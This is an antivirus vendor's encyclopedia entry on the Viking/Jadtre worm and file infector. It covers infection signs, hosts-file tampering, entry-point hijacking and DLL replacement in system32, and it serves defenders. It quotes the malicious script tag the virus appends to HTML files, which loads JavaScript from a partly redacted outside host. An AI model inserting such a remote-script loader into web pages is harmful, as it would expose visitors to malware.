My Bitdefender
  • 0 Shopping Cart

SHARE
THIS ON

Facebook Twitter Google Plus

Win32.Viking.Gen

MEDIUM
MEDIUM
approx 245 kb
(Win32.Jadtre.Gen)

Symptoms

This is a combination of worm and file infector virus which spreads through removable devices and network shares. It affects executable and html files and dramatically slows down the infected computer’s performance.

Removal instructions:

Please let BitDefender disinfect your files.

Analyzed By

Dumitru-Bogdan Prelipcean, virus researcher; Andrei Nacu, virus researcher

Technical Description:

You may be infected with Viking/Jadtre if:

                - there is a hidden autorun.inf created on a removable device, alongside a hidden recycle.{random-string} folder and another hidden folder with a random name.

                - the hosts file has been modified without the user’s consent:

                                - the hosts file does not include its original comments.       

- the hosts file has been emptied of all the IPs you may have added to it, other than the localhost IP.

Viking/Jadtre infects executable files by creating its own section and modifying the entry point so that the virus is executed first, allowing itself to spread. After that, the executable is run normally (except for when it is an installer, because some versions of Viking/Jadtre compromise installers).

Some versions of Viking/Jadtre also infect htmls by appending a malicious script:

<script language=javascriptsrc=http://www.ha[removed].com/js/w.js></script>

The virus deletes dlls from the system32 folder and copies itself in their place usingthe same name(ex.: appmgmts.dll, qmgr.dll, ntmssvc.dll) and sometimes creates a dll called dmutilio.dll. It also creates .sys files in system32 with random names and registers them as services.